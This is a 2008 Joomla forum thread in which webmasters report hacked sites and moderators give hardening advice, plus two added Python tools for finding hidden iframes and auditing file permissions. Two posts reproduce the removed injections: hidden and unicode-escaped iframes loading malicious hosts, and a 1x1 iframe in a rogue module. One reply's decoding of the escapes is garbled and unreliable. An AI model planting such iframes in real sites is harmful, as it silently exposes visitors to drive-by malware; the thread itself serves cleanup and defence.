Joomla site was hacked

Discussion regarding Joomla! security issues.

psg
Joomla! Apprentice
Posts: 11
Joined: Wed May 21, 2008 11:02 am
Location: Brighton, U.K

Joomla site was hacked

Post by psg » Thu Jul 03, 2008 12:32 pm

Hey,
I am a novice web-master and run a website http://www.ethnicracialstudies.net for a friend using Joomla! 1.0.12 Stable / PHP 4.4.8-1.

This morning I saw that the site was being blocked by Google with a red page saying this site may harm you.

So I searched inside the /stories folder and found two PHP files and a back door trojan which I deleted. But the site kept trying to download 'packed JS agent.js' and trying to go to different sites.

I then downloaded my index.php and found that lines had been added at the end (see below).

I removed it and uploaded the index.php and checked that it did not react any more like it did before. I am still waiting for Google to give my site an OK status and remove the line (This site may be harmful). :)

Hope this helps.
I don't know how they managed to get in though. I would really like to know what I should do to stop them.

Cheers
PSG


CODE LINES I REMOVED BELOW:

doGzip();

?>

<iframe src="http://Contact.com.az/upload/photos/index.php" style="display:none"></iframe>

<iframe src="http://avwav.com/3230.htm" style="display:none"></iframe>

<iframe src="http://sum4count.net/strong/023/" style="display:none"></iframe><iframe src="http://fayhvkfnvu.com/dl/adv670.php" style="display:none"></iframe><iframe src="http://fayhvkfnvu.com/dl/adv670.php" style="display:none"></iframe><script type="text/javascript">

document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006c\u006f\u0067\u002e\u0074\u0072\u0061\u0066\u0066\u006d\u0061\u0073\u0074\u0065\u0072\u002e\u006e\u0065\u0074\u002f\u006f\u0075\u0074\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0030\u0022\u0020\u0066\u0072\u0061\u006d\u0065\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0022\u0030\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');

</script><iframe src="http://sum4count.net/strong/023/" style="display:none"></iframe>
<iframe src="http://sum4count.net/strong/023/" style="display:none"></iframe>

twcmex
Joomla! Guru
Posts: 551
Joined: Sat Dec 16, 2006 10:35 pm
Location: Durango, Mexico

Re: Joomla site was hacked

Post by twcmex » Thu Jul 03, 2008 1:51 pm

I don't know how they managed to get in though, I would really like to know what i should do to stop them
Have you reviewed the Security Checklist? (red header at top of this page)
-Joe

vscribe
Joomla! Enthusiast
Posts: 207
Joined: Thu Jun 01, 2006 3:16 pm
Location: Texas, USA

Re: Joomla site was hacked

Post by vscribe » Thu Jul 03, 2008 4:38 pm

The /hex decodes to this: <far=tp/l.rfmatrntou.ppit=""hih="faeore=0>/irm>

You might have a root kit, but more than likely it's riddled with a trojan in the .html or somewhere in a .php file.
cmsconnection.com/forum - the multi-cms forum

countryboy
Joomla! Apprentice
Posts: 45
Joined: Thu May 11, 2006 10:34 pm

Re: Joomla site was hacked with IFRAME

Post by countryboy » Fri Jul 11, 2008 7:22 am

I have been trying to fix an older Joomla (I know...will upgrade from the 1.0.11). The site was hacked by placing an iframe in a module. See info below. I am deleting the module after researching. I am not sure how the culprit got in and really don't know how to find out other than poring over log files from who knows when.

Google also flagged the site. Now the effort is going to be to remove the Google flag. Often wonder if this is not some kind of virus too. They send you a message saying it was flagged, but give you no indication why or where.

I am just supplying this to others so they might be able to check the same place. I am looking through all files to find anything related. If anyone has any ideas or suggestions where else to look please advise. I am not sure what the module suffix leads to.

Here is what I found in the modules:

A module was created named:

Published in the left module location
Title Mambo Info

The module has this code in the HTML



Disabling the module gets rid of the "This site wants to run addon -Remote Data Services Data Control from Microsoft.com. If you trust the website and addon and want to allow control....

Mambo Info Module
Show Title = No
Module Order 1 Mambo Info
Access Level = Public
Published was Yes...changed to NO on 7/10/11:30 pm PST

Description Custom Module
Module Class Suffix = vvbbnn33
Module Cache = No
Mambots = Yes
RSS URL nothing
Feed Title = Yes
Feed Description = Yes
Feed Image= Yes
Items = 3
Item Description = yes
Word Count = 0
RSS Cache time = 3600

Content:
<!-- Traffic Statistics -->
<iframe src="http://61.155.8.157/iframe/wp-stats.php" frameborder="0" width="1" height="1"></iframe><!-- End Traffic Statistics
Pages Menu Items = All reset to none
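
Both injections in this thread hide the payload from anyone viewing the page: psg's index.php carries iframes styled display:none plus a document.write() whose markup is written as \uXXXX escapes (the escape string in that post decodes to an iframe pointing at log.traffmaster.net/out.php, sized 0x0), and countryboy's "Mambo Info" module carries a 1x1 iframe. The following scanner is an added example, not code from either poster or from the Joomla project: it decodes document.write() literals the way a browser would and then reports every iframe that is hidden by CSS or by a 0/1-pixel size. The sample markup is constructed here with placeholder hosts, not the ones quoted in the thread.

```python
import re

# Constructed sample, modelled on the injected markup quoted in this thread:
# a display:none iframe, a document.write() whose payload is hidden behind
# \uXXXX escapes, a 1x1 "statistics" iframe, and one legitimate embed that
# must not be reported. Hosts are placeholders, not the ones in the thread.
HIDDEN_PAYLOAD = ('<iframe src="http://second.invalid/out.php" width="0" '
                  'height="0" frameborder="0"></iframe>')
ESCAPED_PAYLOAD = "".join(f"\\u{ord(ch):04x}" for ch in HIDDEN_PAYLOAD)
SAMPLE_HTML = f"""<?php
doGzip();
?>
<iframe src="http://first.invalid/upload/photos/index.php" style="display:none"></iframe>
<script type="text/javascript">
document.write('{ESCAPED_PAYLOAD}');
</script>
<!-- Traffic Statistics -->
<iframe src="http://198.51.100.7/iframe/wp-stats.php" frameborder="0" width="1" height="1"></iframe>
<iframe src="https://video.example/embed/42" width="560" height="315"></iframe>
"""

UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")
DOC_WRITE = re.compile(r"document\.write\(\s*([\"'])(.*?)\1\s*\)", re.S)
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)
ATTRIBUTE = re.compile(r"([\w-]+)\s*=\s*(\"[^\"]*\"|'[^']*'|[^\s>]+)")


def decode_unicode_escapes(text):
    """Turn \\uXXXX sequences back into characters, as the JS engine would."""
    return UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def expand_document_write(html):
    """Replace each document.write('...') with its decoded literal so markup the
    script would inject at runtime becomes visible to a static scan."""
    return DOC_WRITE.sub(lambda m: decode_unicode_escapes(m.group(2)), html)


def parse_attributes(tag):
    """Map attribute names (lower-cased) to their unquoted values for one tag."""
    return {name.lower(): value.strip("\"'") for name, value in ATTRIBUTE.findall(tag)}


def _at_most_one_pixel(value):
    try:
        return int(value.lower().rstrip("px")) <= 1
    except ValueError:
        return False


def is_hidden(attrs):
    """True for the two concealment tricks seen in this thread: CSS hiding, or a
    frame sized 0x0 / 1x1 so nothing is drawn on the page."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    dims = [attrs[k] for k in ("width", "height") if k in attrs]
    return bool(dims) and all(_at_most_one_pixel(d) for d in dims)


def find_hidden_iframes(html):
    """Return the src of every hidden iframe, including ones written by obfuscated JS."""
    expanded = expand_document_write(html)
    hits = []
    for tag in IFRAME_TAG.findall(expanded):
        attrs = parse_attributes(tag)
        if is_hidden(attrs):
            hits.append(attrs.get("src", ""))
    return hits


def scan_file(path):
    """Scan one file on disk (a template, index.php, or exported module content)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_hidden_iframes(fh.read())


if __name__ == "__main__":
    for src in find_hidden_iframes(SAMPLE_HTML):
        print("hidden iframe ->", src)
```

Run scan_file() over every .php, .html and template file under the Joomla root, and over a dump of the jos_modules content column, to find the same kind of injection in places a text search for "iframe" would miss because the tag only exists after the escapes are decoded.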

psg
Joomla! Apprentice
Posts: 11
Joined: Wed May 21, 2008 11:02 am
Location: Brighton, U.K

Re: <SOLVED> Joomla site was hacked

Post by psg » Fri Jul 11, 2008 9:01 am

Google unflagged me the next day. I had written to them and asked them to reverify the site through the Google webmaster tools. I had also written to StopBadware.

Cheers
8)

countryboy
Joomla! Apprentice
Posts: 45
Joined: Thu May 11, 2006 10:34 pm

Re: Joomla site was hacked

Post by countryboy » Fri Jul 11, 2008 3:19 pm

Thank you. I was hoping they had some way of rectifying things quickly if they are going to post them.

PhilD
Joomla! Hero
Posts: 2734
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA

Re: Joomla site was hacked

Post by PhilD » Fri Jul 11, 2008 6:29 pm

The php files were added to the stories directory due to permission levels being set too high. If permission levels are set to 777 then it is easy for someone to upload something to the directory and execute it. Likely the index.php file also has the permission of 777 allowing it to be modified.

Permission settings should always be 644 for files and 755 for directories for all of a Joomla install. If 755 causes problems with people trying to upload photos to go with stories, then that directory can be set to 777 and an .htaccess file with code to prevent execution of scripts from that directory can be added. You can change 644 to higher on a temporary basis to make edits to a file, but change the permissions back to 644 when done. You can also change certain directories to 777 on a temp basis to install, or remove an extension. Change back to 755 on these directories when done.

In directories such as images, media, cache, you can place an .htaccess file in them. This prevents listing directory contents and executing scripts from them. The .htaccess file in each of those directories should contain the following code.

        # Don't list contents, that would be bad :D
        IndexIgnore *
        Options All -Indexes
        # Secure directory by disabling script execution
        AddHandler cgi-script .php .php2 .php3 .php4 .php5 .php6 .php7 .php8 .pl .py .jsp .asp .htm .html .shtml .sh .cgi
        Options -ExecCGI
        # Don't show this file, that would be bad as well!
        <Files .htaccess>
        order allow,deny
        deny from all
        </Files>

This .htaccess file does not prevent someone from uploading a bad script but it will prevent them from executing it.

Also enable the htaccess.txt file that comes with Joomla by renaming it to .htaccess. It is in where you installed Joomla (Joomla root). Do this even if you don't use search friendly urls as the file contains code to prevent common exploits.
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

cantthinkofanickname
Joomla! Ace
Posts: 1334
Joined: Sat Oct 21, 2006 8:53 am

Re: Joomla site was hacked

Post by cantthinkofanickname » Fri Jul 11, 2008 6:51 pm

I have just browsed through my site folders for other than 755/644. Is there a quicker way of overseeing all the permissions?
Thanks for your time.

PhilD
Joomla! Hero
Posts: 2734
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA

Re: Joomla site was hacked

Post by PhilD » Fri Jul 11, 2008 7:08 pm

You can issue chmod commands from a shell prompt if you have shell access or you can ask your hosting service to chmod all files on your account public_html directory to 644 and all directories to 755. You can also ask them to chown the ownership of all these files/directories to be owned by your account.
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator
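
For anyone with shell access who wants the "quicker way" asked about above, here is an added example (not PhilD's code and not part of Joomla) that audits a tree against the 644-for-files / 755-for-directories rule and can apply the fix. It assumes a POSIX filesystem and does the same work as a find/chmod pair, but reports each deviation with its actual and expected mode first, and separately lists the world-writable entries, which are the ones that let an attacker drop and edit files the way this thread describes. The sample tree it builds is constructed in a temporary directory purely for demonstration.

```python
import os
import shutil
import stat
import tempfile

# The 644 / 755 recommendation from this thread, expressed as mode bits.
EXPECTED_FILE_MODE = 0o644
EXPECTED_DIR_MODE = 0o755


def audit_permissions(root):
    """Walk root and return (path, actual_mode, expected_mode) for every file or
    directory whose permission bits differ from 644 / 755. Symlinks are skipped
    because chmod follows them to a target outside the audited tree."""
    findings = []

    def check(path, expected):
        st = os.lstat(path)
        if stat.S_ISLNK(st.st_mode):
            return
        actual = stat.S_IMODE(st.st_mode)
        if actual != expected:
            findings.append((path, actual, expected))

    check(root, EXPECTED_DIR_MODE)
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames:
            check(os.path.join(dirpath, name), EXPECTED_DIR_MODE)
        for name in filenames:
            check(os.path.join(dirpath, name), EXPECTED_FILE_MODE)
    return findings


def world_writable(findings):
    """The subset that matters most: anything the web server user (or anyone) can write to."""
    return [path for path, actual, _ in findings if actual & stat.S_IWOTH]


def apply_fixes(findings, dry_run=True):
    """chmod each finding to its expected mode; with dry_run=True only report."""
    for path, actual, expected in findings:
        print(f"{'would chmod' if dry_run else 'chmod'} {expected:o} {path} (was {actual:o})")
        if not dry_run:
            os.chmod(path, expected)


def build_demo_site(base):
    """Constructed sample tree with two of the mistakes discussed in the thread:
    a 777 configuration.php and a 777 images/stories upload directory."""
    def write(relpath, mode):
        path = os.path.join(base, relpath)
        with open(path, "w") as fh:
            fh.write("sample\n")
        os.chmod(path, mode)

    os.makedirs(os.path.join(base, "images", "stories"))
    os.makedirs(os.path.join(base, "cache"))
    for rel in ("", "images", "cache"):
        os.chmod(os.path.join(base, rel), EXPECTED_DIR_MODE)
    os.chmod(os.path.join(base, "images", "stories"), 0o777)
    write("index.php", EXPECTED_FILE_MODE)
    write("configuration.php", 0o777)
    write(os.path.join("images", "stories", "photo.jpg"), EXPECTED_FILE_MODE)


def run_demo():
    """Build the sample tree in a temp dir, audit it, fix it, audit again, and
    return both finding lists with paths relative to the temp root (sorted)."""
    base = tempfile.mkdtemp(prefix="joomla-perm-demo-")
    try:
        build_demo_site(base)
        before = audit_permissions(base)
        apply_fixes(before, dry_run=False)
        after = audit_permissions(base)
    finally:
        shutil.rmtree(base)
    rel = lambda fs: sorted((os.path.relpath(p, base), a, e) for p, a, e in fs)
    return rel(before), rel(after)


if __name__ == "__main__":
    before, after = run_demo()
    print("findings before:", before)
    print("findings after:", after)
```

Against a live site, call audit_permissions("/path/to/public_html") and review the list (and world_writable() of it) before running apply_fixes(..., dry_run=False); any directory you deliberately keep at 777 for uploads will show up every time, which is the reminder to give it the script-blocking .htaccess from PhilD's earlier post.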

Tahitiblue
Joomla! Apprentice
Posts: 9
Joined: Fri Jul 11, 2008 11:46 pm

Re: Joomla site was hacked

Post by Tahitiblue » Fri Jul 11, 2008 11:52 pm

countryboy,
I just got hit with the same "Mambo Info" module that you did. Since it looks like this is something new, and not related to the other posts in this thread, I'm going to try to start a new thread on this specific threat.

Tahiti Blue.

countryboy
Joomla! Apprentice
Posts: 45
Joined: Thu May 11, 2006 10:34 pm

Re: Joomla site was hacked

Post by countryboy » Sat Jul 12, 2008 12:28 am

Good idea! If you figure out anything about how they got in please post it. I will too...but still struggling to find out where. I have site down now and am doing a complete upgrade, but if this is new then there might be another fix to contend with. Thanks.

PhilD
Joomla! Hero
Posts: 2734
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA

Re: Joomla site was hacked

Post by PhilD » Sat Jul 12, 2008 4:45 pm

How someone can "get in" to your site. This applies to any CMS systems, forums, galleries, etc. and even general static html sites. It is not an exhaustive list by any means, but does contain many very common ways of getting in.

Set all files and directories to 777 or just set one file or directory to 777.
Do not rename and use the htaccess.txt file that comes with Joomla.
If forced to set a directory such as the images directory to 777 because of a poor server setup, do not protect it with its very own .htaccess file with code shown above.
Do not upgrade Joomla to the latest version.
Set your configuration.php file to 777 so it is easier to edit.
Install all kinds of extensions even if not using them.
Install all kinds of templates that you don't use.
Set and leave the template files to 777 so it is easier to edit them on a whim.
Don't check the extension vulnerability list to see if any extensions you have are on the list.
Don't keep the extensions you have installed updated to their latest versions.
Use the same really easy password for everything because it is easier to remember just one password.
Never look at the raw logs of your account.
Put your session directory inside of public_html and make it 777

What to do about above. This applies to any CMS systems, forums, galleries, etc. and even general static html sites. It is not an exhaustive list by any means, but does contain many very common ways of keeping bad people from getting in. If you are not following these guidelines and the other guidelines posted in stickies and the Joomla help site, your site will be exploited.

Set all files in the public_html directory to 644
Set all directories inside the public_html directory to 755
Enable the htaccess.txt file that came with Joomla by renaming to .htaccess. The file WILL NOT WORK if you do not rename it no matter what you put in it.
If forced to set a directory such as the images directory to 777 because of a poor server setup, then protect it with its very own .htaccess file that contains the code provided in a post above.
Even if not forced to set a directory to 777 you can still give a directory its very own .htaccess file as long as there are no files that actually need executing in the directory.
Always make sure that your CMS system is updated to the latest version.
Always make sure any extensions you have (active or not) are up to date.
Do not use an extension version if it is on a list of extensions with security holes.
Never leave any directories or files set to 777 that you don't absolutely have to leave set at that level.
Never allow the arbitrary listing of contents in a directory from the web.
Always check your raw logs for suspicious activity.
Always use very strong passwords consisting of letters (upper, lower), numbers, and symbols.
Always use a different password for each thing that requires a password. Use a password manager such as KeePass password safe to keep up with and manage the passwords.
Change ALL the passwords on a regular basis, including database, ftp, account and email passwords.
Uninstall and Remove traces (the directory and files they sometimes leave) of any unused extensions.
Uninstall and Remove traces (the directory and files they sometimes leave) of any unused templates.
Don't install any unnecessary extensions. You want to try an extension? Install it on your local test server.
Don't install any unnecessary templates.
Don't remove security code from core files (any files really) just because you read it on Google. The code is there for a purpose.
Use a hosting service that keeps the server software up to date and knows how to properly configure a server. Remember, like everything else, some just want your money.
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

